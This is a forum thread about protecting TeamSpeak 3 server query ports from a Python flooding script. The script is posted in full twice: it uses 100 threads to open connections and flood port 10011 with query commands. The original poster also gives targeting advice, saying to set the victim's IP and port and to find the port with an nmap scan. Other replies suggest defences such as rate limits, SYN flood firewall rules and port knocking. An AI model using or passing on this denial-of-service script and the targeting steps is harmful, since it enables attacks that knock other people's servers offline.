Discussion Be aware from this script - TS3 SYN QUERY PORT FLOODING

developerm

Restricted
Joined
May 22, 2016
Messages
17
Points
41
Location
Turkey
Hello guys,

It's very important for public teamspeak 3 servers
I have very bad problem about this shit python teamspeak 3 exploit.
https://www.dropbox.com/s/qb8zwfpoqrtvqtf/ts3exploit.py
This script is flooding to query with syn packets. After a while your server will crashed or your query port will get rekt and you will cant access to query.
Looks to script codes and if you have any idea about protection query ports from this script, please type your comments.

(Sorry for my bad english)
 

Nýuu™

Member
Joined
Nov 18, 2015
Messages
150
Points
63
If when i change my query port, attackers can find my new query port with nmap very easy.
Also i dont want close query port from all ips.
You dont need to close them from all Ips, just set a limit for it and you should be fine & you can make it very hard to scan so it takes Years.
 

developerm

Restricted
Joined
May 22, 2016
Messages
17
Points
41
Location
Turkey
You dont need to close them from all Ips, just set a limit for it and you should be fine & you can make it very hard to scan so it takes Years.
so can you help me example how can i do this on ubuntu 16.04 64bit
 

Jackbox

Active Member
Joined
Jan 2, 2016
Messages
143
Points
74
Age
24
My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                     
for i in range(100):
        t = MonitorThread()
        t.start()
 

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
459
Points
122
Hello guys,

It's very important for public teamspeak 3 servers
I have very bad problem about this shit python teamspeak 3 exploit.
https://www.dropbox.com/s/qb8zwfpoqrtvqtf/ts3exploit.py
This script is flooding to query with syn packets. After a while your server will crashed or your query port will get rekt and you will cant access to query.
Looks to script codes and if you have any idea about protection query ports from this script, please type your comments.

(Sorry for my bad english)
This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay after around 5 minutes the package loss is going up. lets see what else is happening

Nvm not working. Dont know why it temporarily went up
 
Last edited:

developerm

Restricted
Joined
May 22, 2016
Messages
17
Points
41
Location
Turkey
This doesn't even work. I had 3 of those running for a while but nothing happened. Ping the same, reaction time the same, query works.
Okay after around 5 minutes the package loss is going up. lets see what else is happening

Nvm not working. Dont know why it temporarily went up
this script doesnt work on some ips like ovh game or have limited packets size query port servers.
If you want test type your target ip and change 10011 text for query port if you dont know target server query port, you can get query port easy with nmap tcp scan.

My Python skills are a bit rusty, so pardon me. I have a feeling swapping the port for a variable would make sense too. :cool:

Code:
# TeamSpeak 3 'SYN/TCP' Flooding With Treading
# Using: /usr/bin/python ts3exploit.py
 
import socket
import threading
import random
 
class MonitorThread(threading.Thread):
        def run(self):
                try:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        #Change targetAddress to an IP for testing purposes.
                        targetAddress = "127.0.0.1"
                        s.connect((targetAddress, 10011))
                        for i in range(100):
                                s.send('login serveradmin')
                                s.sendto('login serveradmin',(targetAddress, 10011))
                                s.send('clientlist')
                                s.sendto('clientlist',(targetAddress, 10011))
                                s.send('channellist')
                                s.sendto('channellist',(targetAddress, 10011))
                                for i in range(100):
                                        s.send('serverinfo')
                                        s.sendto('serverinfo',(targetAddress, 10011))
                                        s.send('clientlist')
                                        s.sendto('clientlist',(targetAddress, 10011))
                                        for i in range(100):
                                                s.send('serverinfo')
                                                s.sendto('serverinfo',(targetAddress, 10011))
                                                s.send('channellist')
                                                s.sendto('channellist',(targetAddress, 10011))
                                print "\nFLOODING..."
                except Exception, ex:
                        pass
                    
for i in range(100):
        t = MonitorThread()
        t.start()
You cant attack only change ip address this is not enough, you need change also "10011" text to target ip query port.
If you dont know target ip query port, you can get easily with nmap

Who coded that script xD
i got this script from my friend, i dont know his getting where but i know that this script work on all teamspeak 3 server versions.
Helpppp
 
Last edited by a moderator:

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
459
Points
122
this script doesnt work on some ips like ovh game or have limited packets size query port servers.
If you want test type your target ip and change 10011 text for query port if you dont know target server query port, you can get query port easy with nmap tcp scan.
Yes I know my query port.. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
 

Sigi

Member
Joined
Aug 15, 2016
Messages
3
Points
35
Age
22
Yes I know my query port.. I tried it on my own server and had 3 of them running at the same time. No effect. You sure that's even the script they are using?
i tried some servers but sometimes not working. i think this protected servers did something for block this script but still dont know how can i save my servers from this script. also for now i just close 10011 port from all ips. but i dont want it, i want my query port be online always. if you have any idea about this plz comment
 

Jackbox

Active Member
Joined
Jan 2, 2016
Messages
143
Points
74
Age
24
i tried some servers but sometimes not working. i think this protected servers did something for block this script but still dont know how can i save my servers from this script. also for now i just close 10011 port from all ips. but i dont want it, i want my query port be online always. if you have any idea about this plz comment
Pretty sure this is a generalized SYN flood. Look at SYN flood protection firewall rules.
 

sh4c4w

Member
Joined
Oct 27, 2015
Messages
5
Points
35
Age
29
Instead of fully exposing your query port to the world, use a port knocking script.
It's pretty simple and adds a very good layer of security on your network.
 

Top